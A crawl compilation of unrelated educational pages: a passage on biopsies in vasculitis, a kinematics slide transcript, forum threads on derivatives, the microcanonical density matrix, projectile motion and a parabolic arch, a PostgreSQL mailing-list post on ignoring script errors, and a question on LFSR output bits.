Surgical biopsies of radiographically abnormal pulmonary parenchyma have a diagnostic yield of 90% in patients with granulomatosis with polyangiitis (Wegener's) and play an important role in ruling out infection or malignancy. The yield of lung biopsies is strongly associated with the amount of tissue that can be obtained; transbronchial biopsies, while less invasive, have a yield of only 7%. Lung biopsies also play an important role in microscopic polyangiitis, Churg-Strauss syndrome, and in any vasculitic disease where an immunosuppressed patient has pulmonary disease that is suspected to be an infection.
Kidney biopsy findings of a focal, segmental, crescentic, necrotizing glomerulonephritis with few to no immune complexes (pauci-immune glomerulonephritis) are characteristic in patients with granulomatosis with polyangiitis (Wegener's), microscopic polyangiitis, or Churg-Strauss syndrome, who have active renal disease. These findings not only distinguish these entities from other causes of glomerulonephritis, they can confirm the presence of active glomerulonephritis that requires treatment. Because of this, renal biopsies can also be helpful to guide management decisions in these diseases when an established patient has worsening renal function and an inactive or equivocal urine sediment. Cryoglobulinemic vasculitis and Henoch-Schönlein purpura are other vasculitides where renal involvement may occur and where biopsy may be important in diagnosis or prognosis.
Biopsies of the skin are commonly performed and are well tolerated. As not all purpuric or ulcerative lesions are due to vasculitis, skin biopsy plays an important role to confirm the presence of vasculitis as the cause of the manifestation. Cutaneous vasculitis represents the most common vasculitic feature that affects people and can be seen in a broad spectrum of settings including infections, medications, malignancies, and connective tissue diseases. Because of this, for ...
|
2014-10-21 02:10:31
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2366647720336914, "perplexity": 6286.722257523489}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-42/segments/1413507443869.1/warc/CC-MAIN-20141017005723-00133-ip-10-16-133-185.ec2.internal.warc.gz"}
|
http://slideplayer.com/slide/4457976/
|
# 5. Kinematics, Summer School 2007, B. Rossetto (presentation transcript)
Slide 1 (5. Kinematics): Piecewise constant velocity. [Figure: x(t) sampled at times t_0, ..., t_i, t_{i+1}, ..., t_n with step h.] The distance covered during the time interval is Δx_i = v(t_i)·h; v(t_i) is the slope of the segment.
Slide 2 (5. Kinematics): Instantaneous velocity. [Figure: x(t) at times t_i and t_i + h; the definitions of velocity and acceleration were rendered as images and are not recoverable.]
Slide 3 (5. Kinematics): Velocity and acceleration, in Cartesian and polar coordinates (cf. chap. 1 Coordinates, slide 7).
Slide 4 (5. Particle motion): First law of Newton (inertia principle); define a system (particle, system of particles, solid). Second law (principle) of Newton; as a consequence, a system with interaction changes, depending on the inertial mass m.
Slide 5 (5. Motion): Extension to variable-mass systems. Definition of the momentum of the system; 1st law: principle of conservation of momentum; 2nd law: fundamental law of dynamics.
Slide 6 (5. Kinematics): Rotational dynamics. 1 - Definition of angular momentum (the angular momentum and the torque must be evaluated relative to the same point O). 2 - Fundamental theorem of rotational dynamics, with proof; the torque of the force generates the movement.
Slide 7 (5. Kinematics): Motion under constant acceleration (parametric equation of a parabola), by double integration and projection.
Slide 8 (5. Kinematics): Fluid friction (2nd-order differential equation with constant coefficients). Example: free fall of a particle in a viscous fluid. [Figure: v(t) rising toward a limit speed.] The limit speed and the speed as a function of time follow from the second law; K: shape coefficient (body), η: viscosity (fluid).
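The slide's equations were images and did not survive extraction. Assuming the standard linear-drag model that the slide describes, m·dv/dt = m·g − K·η·v, a small Python sketch reproduces the curve of v(t) approaching the limit speed (all parameter values below are illustrative assumptions):

```python
# Free fall with linear fluid friction: m*dv/dt = m*g - K*eta*v.
# Closed-form solution: v(t) = v_lim * (1 - exp(-t/tau)), with
# v_lim = m*g/(K*eta) and tau = m/(K*eta).
import math

m, g = 1.0, 9.81      # kg, m/s^2
K, eta = 0.5, 2.0     # shape coefficient (body) and viscosity (fluid), assumed values

v_lim = m * g / (K * eta)   # limit (terminal) speed
tau = m / (K * eta)         # time constant of the exponential approach

for t in [0.0, tau, 2 * tau, 5 * tau]:
    v = v_lim * (1.0 - math.exp(-t / tau))
    print(f"t = {t:5.2f} s  v = {v:6.3f} m/s (limit {v_lim:.3f} m/s)")
```

After a few time constants the speed is effectively at the limit value, which is the behavior the slide's figure shows.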
Slide 9 (5. Kinematics): Sliding friction. Frictional force characterized by a friction coefficient; example: inclined plane. Static coefficient > dynamic coefficient. Project the fundamental law of dynamics (2nd Newton law) onto the Ox and Oy axes.
Slide 10 (5. Kinematics): Uniform circular motion. Definition of uniform circular motion and of angular velocity; the acceleration (from chap. I Coordinates, slide 7) is central. [The theorem and equations were rendered as images and are not recoverable.]
Slide 11 (5. Kinematics): Motion under central force (1). Example: gravitation between O(m) and P(m'). Uses the theorem of slide 5 and the 2nd Binet law; sketch of proof via the expression of the acceleration in polar coordinates. m: gravitational mass, equal to the inertial mass (3rd Newton law).
Slide 12 (5. Kinematics): Motion under central force (2). [Figure: ellipse with semi-axes a and b, parameter p, focuses F and F'; the origin is one of the focuses F'; point M(r, θ); apsides A and A'.] Solution of the differential equation.
Slide 13 (5. Work and energy): Work: definition of the work of a force along a curve. Property: if there exists E_P such that the force derives from it, then the force is conservative. Potential energy: the potential energy of a conservative force vector field is defined as a primitive. Kinetic energy: the kinetic energy of a particle of mass m and velocity v is defined as E_k = (1/2)mv^2.
|
2019-11-12 06:53:06
|
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8740033507347107, "perplexity": 11308.487773627732}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-47/segments/1573496664752.70/warc/CC-MAIN-20191112051214-20191112075214-00498.warc.gz"}
|
http://mathhelpforum.com/calculus/204897-derivitive-help.html
|
1. ## derivative help!
Please help! I just can't get through this problem and I really need someone to tell me what I need to do.
The problem is as follows: f(x) = 1/√x, and we're using the formula "limit as Δx approaches 0 of [f(x + Δx) - f(x)] / Δx". I'm unsure of how to start this problem, so any help would be so useful! Thank you!!
2. ## Re: derivative help!
We are told to use first principles to find the derivative of $f(x)=\frac{1}{\sqrt{x}}$ hence:
$f'(x)\equiv\lim_{\Delta x\to0}\frac{f(x+\Delta x)-f(x)}{\Delta x}=\lim_{\Delta x\to0}\frac{\frac{1}{\sqrt{x+\Delta x}}-\frac{1}{\sqrt{x}}}{\Delta x}$
Your goal is to rewrite the expression so that you can substitute zero for $\Delta x$ and not get division by zero. I would begin by combining the terms in the numerator with a common denominator, then rationalize the resulting numerator. See what you get. Post your work if you get stuck.
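For reference, carrying the hint through (one possible worked path, not part of the original reply): combining the numerator over a common denominator and multiplying by the conjugate $\sqrt{x}+\sqrt{x+\Delta x}$ gives

$$\frac{\frac{1}{\sqrt{x+\Delta x}}-\frac{1}{\sqrt{x}}}{\Delta x}=\frac{\sqrt{x}-\sqrt{x+\Delta x}}{\Delta x\,\sqrt{x}\,\sqrt{x+\Delta x}}=\frac{-1}{\sqrt{x}\,\sqrt{x+\Delta x}\left(\sqrt{x}+\sqrt{x+\Delta x}\right)}$$

so letting $\Delta x\to0$ yields $f'(x)=-\frac{1}{2x^{3/2}}$, consistent with the power rule applied to $x^{-1/2}$.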
|
2017-11-18 10:31:57
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 3, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9031959772109985, "perplexity": 406.4917923373961}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-47/segments/1510934804724.3/warc/CC-MAIN-20171118094746-20171118114746-00311.warc.gz"}
|
https://www.physicsforums.com/threads/microcanonical-ensemble-density-matrix.782954/
|
# Microcanonical ensemble density matrix
Tags:
1. Nov 18, 2014
### Seban87
Ref: R.K Pathria Statistical mechanics (third edition sec 5.2A)
First it is argued that the density matrix for the microcanonical ensemble will be diagonal, with all diagonal elements equal, in the energy representation. Then it is said that this general form should remain the same in all representations, i.e. all the off-diagonal elements zero and the diagonal elements all equal to one another.
This is my question. Why should the form necessarily be the same in all representations? To say that all diagonal elements (in any representation) are equal means that the probabilities for measuring all eigenvalues of any operator are the same. We may argue that the probability for measuring any energy eigenvalue within the specified range is the same (based on equal a priori probabilities).
2. Nov 18, 2014
### atyy
Pathria doesn't say that. He says in other representations the density matrix is not diagonal. He does say it will still be symmetric.
3. Nov 19, 2014
### Seban87
Thanks. But Pathria does say it. Please refer to page 119,120 in statistical mechanics third edition by Pathria. These pages correspond to section 5.2. It is given so in other editions too. (page 118 in first edition, page 108 in second edition)
On page 119,
$$\rho_{mn} = \rho_n \delta_{mn} \qquad (1)$$
$$\rho_n = \begin{cases} 1/\Gamma & \text{for each of the accessible states} \\ 0 & \text{for all other states} \end{cases} \qquad (2)$$
On page 120:
"The density matrix in the energy representation is then given by equations (1) and (2). If we now change over to any other representation, the general form of the density matrix should remain the same, namely (i) the off-diagonal elements should continue to be zero, while (ii) the diagonal elements (over the allowed range) should continue to be equal to one another."
In fact he invokes the postulate of random a priori phases to ensure the nondiagonal elements zero. Is it valid for eigenstates of any operator or just the energy eigenstates?
Last edited: Nov 19, 2014
4. Nov 19, 2014
### atyy
I see. I looked up http://ocw.mit.edu/courses/physics/8-333-statistical-mechanics-i-statistical-mechanics-of-particles-fall-2007/lecture-notes/lec21.pdf [Broken] (p136) and http://www.jamia-physics.net/lecnotes/statmech/lec09.pdf (p2) and it seems the random phase assumption is applied in the energy basis.
Last edited by a moderator: May 7, 2017
5. Nov 19, 2014
### Seban87
Yes, I found the postulate of random phases being applied to energy representation else where too. But Pathria has the density matrix automatically diagonal in energy basis and makes it diagonal in all other basis by applying this postulate. This is what I find confusing. In lecture 9 of the link you gave it is said that the energy eigenstates have a special status by this postulate...
6. Nov 19, 2014
### Seban87
What I find most confusing is the equality of the diagonal elements of the density matrix in all representations. I am not able to understand this.
7. Nov 19, 2014
### kith
If the off-diagonal elements are all zero and the diagonal elements are all equal, your density matrix is proportional to the identity matrix. The identity matrix can be decomposed into eigenstates of any observable, so the density matrix looks the same for all observables.
From a statistical / information-theoretic point of view, such a density matrix corresponds to a situation where you know nothing about your system. So you just assign equal probabilities to all possible (pure) states.
Also for really high temperatures, the density matrix of all systems approximately has this form. For $T \rightarrow \infty$, the Boltzmann factors $$\exp\left(-\frac{E_n}{kT} \right)$$ become all equal to $1$, so the equilibrium density matrix is -up to a normalization constant- equal to the identity matrix.
I don't know the exact context of your question because I don't have the book.
Last edited: Nov 19, 2014
8. Nov 19, 2014
### Seban87
That's right. But the density matrix is made diagonal in this book by invoking the postulate of random phases. The diagonal elements are said to be equal due to the postulate of equal a priori probabilities. My question then is this: does the postulate of equal a priori probabilities imply that all eigenstates of any operator have the same probabilities? Or is it a statement about energy eigenstates only?
I understand what you said. But do we know a priori that the density matrix for the microcanonical ensemble is proportional to the identity matrix? This is what Pathria seems to imply. Wouldn't it depend on the states of the system and the basis chosen?
9. Nov 20, 2014
### vanhees71
I think, this book by Pathria is pretty enigmatic, although I've not looked at it in great detail. A clear distinction between abstract Hilbert-space vectors and representations, is mandatory for a well-understandable derivation. I can just copy my answer of a private communication with the OP:
I don't understand what Pathria is saying in the beginning of this section at all. Let's tranlate it to the usual notation of quantum statistics. The microcanonical ensemble is correctly described in words: It's a closed system of fixed particle number and volume and an energy in a finite (!) interval $E \in (E_0-\Delta/2,E_0+\Delta/2)$. Now let's assume a system with a continuous energy spectrum as is usual for, e.g., an ideal gas. Then the microcanonical statistical operator is
$$\hat{\rho}=\frac{1}{\Delta} \int_{E_0-\Delta/2}^{E_0+\Delta/2} \mathrm{d} E |E \rangle \langle E|.$$
In general, if written in another basis, it's not diagonal anymore. Why should it be?
The statistical operator of a pure state is
$$\hat{\rho}_{\psi}=|\psi \rangle \langle \psi|,$$
where $|\psi \rangle$ is normalized to 1. Of course $\hat{\rho}_{\psi}$ is a projection operator, and any positively semidefinite self-adjoint operator with trace 1 represents a pure state if and only if it's a projection operator. It's of course also only diagonal in this one representation and not for any basis.
I don't understand the notation of Eq. (5) in the book. With respect to an arbitrary basis $|u_n \rangle$ the matrix elements are
$$\rho_{\psi n_1n_2}=\langle u_{n_1}|\hat{\rho}_{\psi}|u_{n_2} \rangle=\psi(n_1) \psi^*(n_2),$$
where
$$\psi(n)=\langle u_n |\psi \rangle.$$
So I guess that's what he means with $a_n$ in his strange notation.
10. Nov 20, 2014
### kith
If it worked, the argument would go like this
$$\rho = \sum_n p |E_n\rangle \langle E_n| = p \sum_n |E_n\rangle \langle E_n| = p \hat{1} = p \sum_i |a_i\rangle \langle a_i| = \sum_i p |a_i\rangle \langle a_i|$$
where $|a_i\rangle$ are the eigenstates of an arbitrary observable $A$.
But reading vanhees post, I realized that I wasn't talking about the microcanonical ensemble at all. Since there's only a small number of energy eigenstates present in the mixture, we are far from getting the identity matrix. I too think that the statement is false.
Last edited: Nov 20, 2014
11. Nov 20, 2014
### vanhees71
No! The sum over $n$ is of course not complete, because then you'd have $\hat{\rho} \propto \hat{1}$, which is the probability distribution for complete ignorance and doesn't make sense at all, because you can not normalize its trace to 1 (except if you are in a finite dimensional space of states like for a spin observable or something similar).
For a discrete energy spectrum (e.g., a particle or many particles in a harmonic oscillator potential), the whole thing is easier than my example. Then you have
$$\hat{\rho}_{\text{micro}}=\frac{1}{N} \sum_{k=1}^{N} |E_k \rangle \langle E_k|.$$
This is motivated from an information-theoretical point of view by maximizing the entropy for the case that you know that the energy of your system takes one of the values $\{E_1,\ldots ,E_N \}$ but for sure not one of the values $E_k$ with $k \in \{N+1,N+2,\ldots\}$.
Then in any other basis $|a_i \rangle$ you have
$$\rho_{\text{micro} ij}=\langle a_i |\hat{\rho}_{\text{micro}}|a_j \rangle = \frac{1}{N} \sum_{k=1}^{N} \langle a_i|E_k \rangle \langle E_k|a_j \rangle.$$
The matrix in the representation wrt. to the new basis is not necessarily diagonal!
Last edited: Nov 20, 2014
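To see this point concretely, here is a small numerical sketch (illustrative only; the alternative basis is generated from a random unitary, nothing from the book). An equal mixture of N energy eigenstates inside a larger Hilbert space is diagonal in the energy basis but acquires nonzero off-diagonal elements in a generic other basis:

```python
# A microcanonical density matrix (equal weights on N energy eigenstates out of
# a larger space) is diagonal in the energy basis but generally NOT diagonal
# in another basis. Toy example.
import numpy as np

dim, N = 4, 2                               # 4-dim toy Hilbert space, 2 accessible states
rho = np.zeros((dim, dim))
rho[:N, :N] = np.eye(N) / N                 # (1/N) * sum_k |E_k><E_k| in the energy basis

rng = np.random.default_rng(0)
A = rng.normal(size=(dim, dim)) + 1j * rng.normal(size=(dim, dim))
U, _ = np.linalg.qr(A)                      # random unitary: some other basis |a_i>

rho_a = U.conj().T @ rho @ U                # density matrix expressed in the new basis
print(np.round(rho_a, 3))                   # off-diagonal elements are nonzero
print(np.isclose(np.trace(rho_a).real, 1))  # the trace is still 1, as it must be
```

The trace and the eigenvalues are basis independent, but the matrix elements are not, which is exactly the statement above.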
12. Nov 20, 2014
### kith
Yes, that assumption was implicit in my equation. So it's a bad equation for two reasons, thanks for pointing it out.
13. Nov 20, 2014
### Seban87
Yes. It is now that Pathria invokes the postulate of random phases to make it diagonal. The average of $$c_n c_m^*$$ becomes zero for $m \neq n$ due to random phases among the states, i.e. writing $c_n = |c_n| e^{i\theta_n}$:
$$\langle c_n c_m^* \rangle = |c_n| |c_m| \langle e^{i(\theta_n - \theta_m)} \rangle = |c_n|^2 \delta_{nm}.$$
In order to make all diagonal elements equal, the postulate of equal a priori probabilities is invoked. Thus $$|c_n|^2 = |c|^2$$ for all n.
Is the postulate of random phases true for eigenstates of all operators or just energy eigenstates?
Does the postulate of equal a priori probabilities say that all eigenstates of any operator are equally probable to be realized under a measurement? I think the question boils down to the validity and exact meaning of these two statements.
Last edited: Nov 21, 2014
14. Nov 21, 2014
### Seban87
In a correspondence with one of my professors I understand that observables cannot distinguish states within the microcanonical subspace. So the density matrix in this subspace is always going to be proportional to the identity matrix.
Also I see that what vanhees71 says here has to be applicable to eigenvectors of all other operators too. So all of them have to be taken to be equally probable. This, I think, explains the fact that all diagonal elements have to be equal. Now the random phases resulting from interactions with the external world would make sure that all nondiagonal elements are zero. Conclusion: The density matrix in the microcanonical subspace is always proportional to the identity matrix.
15. Nov 22, 2014
### vanhees71
No! You know something about the system when considering the microcanonical ensemble, namely that the energy is for sure in a certain interval, and this makes the energy eigenstates special. That's why, according to the maximum-entropy principle, the statistical operator is diagonal in the energy eigenbasis, the states with eigenvalues in the given interval are equally probable, and all others have 0 probability. This does not imply that the same is the case for any other observable, and that's why the statistical operator of the microcanonical ensemble is usually not diagonal wrt. the eigenstates of another observable!
Another thing is, when you measure an observable and find it to be in a certain interval. Then, due to decoherence via interactions of the quantum system with the measurement apparatus and/or "the environment" the phases are averaged out, and you assign another statistical operator, again using the maximum entropy principle, adapted to the new knowledge you gained through the measurement of the observable. If this observable is not compatible with the energy (i.e., if it is not a conserved quantity) the new statistical operator is no longer a microcanonical statistical operator.
16. Nov 25, 2014
### Seban87
Here is another explanation from a correspondence with one of the authors. Now this seems simple. If the density matrix is proportional to the identity matrix in the energy representation, then it has to be so in any other representation. This is because the matrices in different bases are connected by unitary transformations, and the unitary transformation of a matrix proportional to the identity matrix gives back the same matrix (as long as we are confined to the microcanonical subspace).
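A quick way to convince oneself numerically (a minimal numpy sketch; the dimension N and the random unitary are arbitrary choices):

import numpy as np

# A density matrix proportional to the identity on an N-dimensional subspace
# keeps that form under any change of basis: U (I/N) U^dagger = (1/N) U U^dagger = I/N.
N = 4
rho = np.eye(N) / N                       # microcanonical rho on the subspace

# Random unitary via QR decomposition of a complex Gaussian matrix
A = np.random.randn(N, N) + 1j * np.random.randn(N, N)
U, _ = np.linalg.qr(A)

rho_new = U @ rho @ U.conj().T            # rho in the new basis
print(np.allclose(rho_new, rho))          # True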
17. Nov 25, 2014
### vanhees71
The canonical density matrix is not proportional to the identity operator. In general, the identity operator cannot be a statistical operator at all, because it does not have finite trace (unless you are in a finite-dimensional Hilbert space; even then it refers to the state of minimal possible information, not to the microcanonical ensemble, where the energy is known to be in a certain (small) range of possible values).
18. Nov 25, 2014
### Seban87
Not the Canonical density matrix. I was referring solely to microcanonical ensemble.
19. Nov 25, 2014
### Seban87
Let us see what goes wrong in the following reasoning.
In the energy representation, the microcanonical density matrix has the form $$\rho_{m,n} = \frac{1}{N} \delta_{m,n}.$$ Clearly it is proportional to the identity operator here.
Now the matrix in any other representation has to be related to this one by a unitary transformation, and a unitary transformation of a matrix proportional to the identity matrix gives back the same matrix, doesn't it? After all, the unitary transformation of the identity matrix is again the identity matrix.
So, doesn't this reasoning imply that it has to be proportional to the identity matrix in any representation? If not what has gone wrong in the above?
20. Nov 25, 2014
### Seban87
Perhaps this whole thing is true for a discrete basis...
https://www.mail-archive.com/pgsql-patches@postgresql.org/msg07649.html
Re: [HACKERS] [PATCHES] Continue transactions after errors in psql
Richard Huxton <dev@archonet.com> writes:
> Michael Paesold wrote:
>> I just don't see why non-interactive mode does need such a switch
>> because there is no way to check if there was an error. So just put two
>> queries there and hope one will work?
> DROP TABLE foo;
> CREATE TABLE foo...
Unconvincing. What if the drop fails for permission reasons, rather
than because the table's not there? Then the CREATE will fail too
... but now the script bulls ahead regardless, with who knows what consequences.
I would far rather see people code explicit markers around statements
whose failure can be ignored. That is, a script that needs this
behavior ought to look like
BEGIN;
\begin_ignore_error
DROP TABLE foo;
\end_ignore_error
CREATE ...
...
COMMIT;
where I'm supposing that we invent psql backslash commands to cue
the sending of SAVEPOINT and RELEASE-or-ROLLBACK commands. (Anyone
got a better idea for the names than that?)
Once you've got such an infrastructure, it makes sense to allow an
interactive mode that automatically puts such things around each
statement. But I can't really see the argument for using such a
behavior in a script. Scripts are too stupid.
regards, tom lane
https://www.physicsforums.com/threads/firing-cannons-projectile-motion.750859/
# Firing cannons projectile motion
1. Apr 26, 2014
### Psychros
1. The problem statement, all variables and given/known data
A cannonball is fired with initial speed v0 at an angle 30° above the horizontal from a height of 38.0 m above the ground. The projectile strikes the ground with a speed of 1.3v0. Find v0. (Ignore any effects due to air resistance.)
2. Relevant equations
Time: 0 = v0·T − ½g·T², T < 0
t = (v0y + √(v0y² − 2g·y))/g
distance/range: x = x0 + v0x·t
x/y velocity: v0x = v·cos(θ); v0y = v·sin(θ)
3. The attempt at a solution
This is a practice problem (with different values than the original), and the provided answer is 32.9 m/s.
I set the origin at the cannon.
Since the velocity magnitude = √((v·cos(θ))² + (v·sin(θ))²),
I tried variations along the lines of v0²cos²(30°) + v0²sin²(30°) = 1.3v0²
in order to split the velocity into x-y components.
Conceptually I understand it takes −38 m to reach 1.3 times the original velocity, but in trying to plug the provided data into the equations I end up with too many variables.
Any and all help very appreciated, thank you.
2. Apr 26, 2014
### SteamKing
Staff Emeritus
I'm not sure what you are trying to do here. The angle at which the projectile strikes the ground may not be equal to the initial firing angle, i.e. 30 degrees.
The best way to approach this problem is to find the maximum altitude which the projectile reaches after it is fired. At this point, the vertical component of the velocity is zero. After reaching the maximum altitude, the projectile falls under the force of gravity. Knowing the magnitude of the final velocity, you should be able to determine the duration of the fall and the resulting vertical velocity component. Remember, since there is no air resistance, the horizontal component of the velocity remains unchanged during the entire flight of the projectile.
3. Apr 26, 2014
### Psychros
That is brilliant, thank you. However, without knowing the distance (x), the time, or a hard value for the velocity (since it's expressed as a relation to the initial velocity), I'm not sure how to go about this.
4. Apr 26, 2014
### SammyS
Staff Emeritus
Try using conservation of energy.
5. Apr 26, 2014
### Psychros
Hmmm I don't think we've learned that yet..
6. Apr 26, 2014
### SammyS
Staff Emeritus
In that case,
What can you conclude about the x component of the velocity?
What kinematic equations do you know regarding the vertical component of the velocity ?
7. Apr 26, 2014
### Psychros
The x component will be the same through its entirety.
y = y0 + v0y·t + ½a·t²
or
vy = v0y + g·t
vy = 1.3·v0y − 9.81·t
But theoretically, if we were starting at the maximum, v0y would = 0,
vy/(−9.81) = t?
I'm getting stuck down either avenue, I do think i'm missing something intuitive here..
8. Apr 26, 2014
### SammyS
Staff Emeritus
vy ≠ 1.3 v0y . I'm assuming that you mean vy to be the y component of the final velocity.
How is speed obtained from components of velocity ?
Also, there's another kinematic equation. One that doesn't involve time, t.
Edited:
~~(vy)² = (v0y)² − g(Δy)~~
(vy)² = (v0y)² − 2g(Δy)
Last edited: Apr 27, 2014
9. Apr 27, 2014
### Psychros
Do you mean speed as in magnitude of velocity?
Also, should (vy)² = (v0y)² − g(Δy)
have a −2g(Δy)?
I apologize for being slow, but I'm not sure how to use this either, since I don't know the change in height from the maximum.
10. Apr 27, 2014
### SammyS
Staff Emeritus
Right. There should be a 2 in there.
Then, ...
How is speed obtained from components of velocity ?
11. Apr 27, 2014
### Psychros
Since speed is the magnitude of velocity,
by components of velocity I imagine you mean vx and vy,
or √((v·cos(θ))² + (v·sin(θ))²)?
12. Apr 27, 2014
### SammyS
Staff Emeritus
Yes. Of course, sin²(θ) + cos²(θ) = 1
Anyway, $\ v_0=\sqrt{(v_{0x})^2+(v_{0y})^2}\ ,\$ so that $\ (v_0)^2=(v_{0x})^2+(v_{0y})^2\ .\$
And in general $\ v^2=(v_{x})^2+(v_{y})^2\ .\$ Right?
Now, what do you know regarding the x component of velocity for this projectile?
13. Apr 27, 2014
### Psychros
sorry, that's what I meant when I put √((v0·cos(θ))² + (v0·sin(θ))²), that it's = v0.
I know that it doesn't change, but I'm not sure how to find its magnitude in this situation.
14. Apr 27, 2014
### SammyS
Staff Emeritus
So then $v_{0x}=v_x\$ .
Regarding your kinematic equation with the $(v_{y})^2\,$, what is it missing for it to have v2 and v02 in it ?
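For reference, here is where this chain of reasoning ends up, as a minimal Python check (assuming g = 9.81 m/s²; note that the 30° launch angle drops out entirely):

import math

g, h = 9.81, 38.0      # gravitational acceleration (m/s^2), launch height (m)
# Since vx is constant: v^2 = vx^2 + vy^2 = v0x^2 + (v0y^2 + 2*g*h) = v0^2 + 2*g*h
# With v = 1.3*v0:      (1.3*v0)^2 = v0^2 + 2*g*h  =>  v0^2 = 2*g*h / (1.3^2 - 1)
v0 = math.sqrt(2 * g * h / (1.3**2 - 1))
print(round(v0, 1))    # 32.9 m/s, matching the provided answer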
https://www.physicsforums.com/threads/pre-calc-word-problem-parabolic-archway.394810/
# Homework Help: Pre calc word problem Parabolic archway
1. Apr 12, 2010
### unrealmatt3
1. The problem statement, all variables and given/known data
A parabolic archway is 12 meters high at the vertex. At a height of 10 meters, the width of the archway is 8 meters. How wide is the archway at ground level?
2. Relevant equations
Given in the picture: it has (-4, 10) and (4, 10), along with the vertex (0, 12).
3. The attempt at a solution
(y − 12)² = 4p(x − 0)
12 = 4p(0), p = 3?? I don't know if I need this
I have a picture but I'm not sure what I need to do
2. Apr 13, 2010
### rl.bhat
Hi unrealmatt3, welcome to PF.
Consider vertex as the origin.
The equation of the parabola becomes
y^2 = 4*p*x.
In the first position x = (12 - 10) and y = 4. Find p.
In the second position x = 12. p is known. find y.
2y will give you the required result.
3. Apr 13, 2010
### unrealmatt3
hey, thanks rl.bhat for the welcome.
so I think I got it... first 16 = 4·p·x where x = 2, therefore p = 2
2nd: y² = 4(2)(12)
y² = 96
y = 4$$\sqrt{6}$$
then 2y = 19.6 meters
4. Apr 13, 2010
### rl.bhat
That is right.
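A minimal Python check of the two steps (vertex at the origin, with x measured downward from the vertex):

import math

# Step 1: y^2 = 4*p*x with x = 12 - 10 = 2 and half-width y = 4  =>  p = 2
p = 4**2 / (4 * 2)
# Step 2: at ground level x = 12, so the half-width is y = sqrt(4*p*12)
y = math.sqrt(4 * p * 12)
print(round(2 * y, 1))   # 19.6 (meters), the full width at ground level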
https://crypto.stackexchange.com/questions/89061/listing-first-8-bits-generated-by-lfsr
# Listing first 8 bits generated by LFSR
Consider the primitive polynomial P(x) = x^4 + x^3 + 1, initialized with the bit string (shifting occurs from left to right, were the right-most bit represents the LFSR output): 1101.
List the first 8-bits generated by the LFSR, starting with the bit 1 that is the right-most bit of the initialization sequence above.
This was my work to solve this:
s1 s2 s3 s4 output (s4 xor s3)
[[ 1 0 1 1 0
0 1 0]] 1 1
1 0 1 0 1
1 1 0 1 1
1 1 1 0 1
1 1 1 1 0
0 1 1 1 0
0 0 1 1 0
The answer is: 10110010. Is this because it is the result of what I have put in brackets?
• Questions asking for solutions to crypto puzzles or homework exercises are off-topic. While we do accept questions about homework problems, such questions must contain more than just a verbatim copy of the assignment, and should preferably ask for general solving techniques rather than just a solution to a specific puzzle or exercise – kodlu Mar 26 at 20:55
A few things have gone wrong:
1. You've reversed the initial state, but continued to shift from left to right. If you do reverse then the shift is from right to left.
2. You've confused the output bit (the oldest bit in the register) with the feedback bit (the new value that is introduced after shifting)
3. The feedback rule for the polynomial $$x^4+x^3+1$$ is $$s_{i+4}=s_{i+3}\oplus s_{i}$$ and so in your notation would be $$s_4$$ xor $$s_1$$
With this borne in mind, the first two rows of your table should read as follows:
s1 s2 s3 s4 feedback bit (s4 xor s1) output bit (s1)
1 0 1 1 0 1
0 1 1 0 0 0...
and so on
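A minimal Python sketch of this corrected procedure (state stored as [s1, s2, s3, s4]) reproduces the expected answer:

state = [1, 0, 1, 1]                 # initial register contents s1..s4
out = []
for _ in range(8):
    out.append(state[0])             # output bit s1 (the oldest bit)
    fb = state[3] ^ state[0]         # feedback bit s4 xor s1, from x^4 + x^3 + 1
    state = state[1:] + [fb]         # shift right-to-left, insert feedback
print(''.join(map(str, out)))        # 10110010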
• Did you mean feedback bit is s4 xor s3? – hollyjolly Mar 26 at 15:14
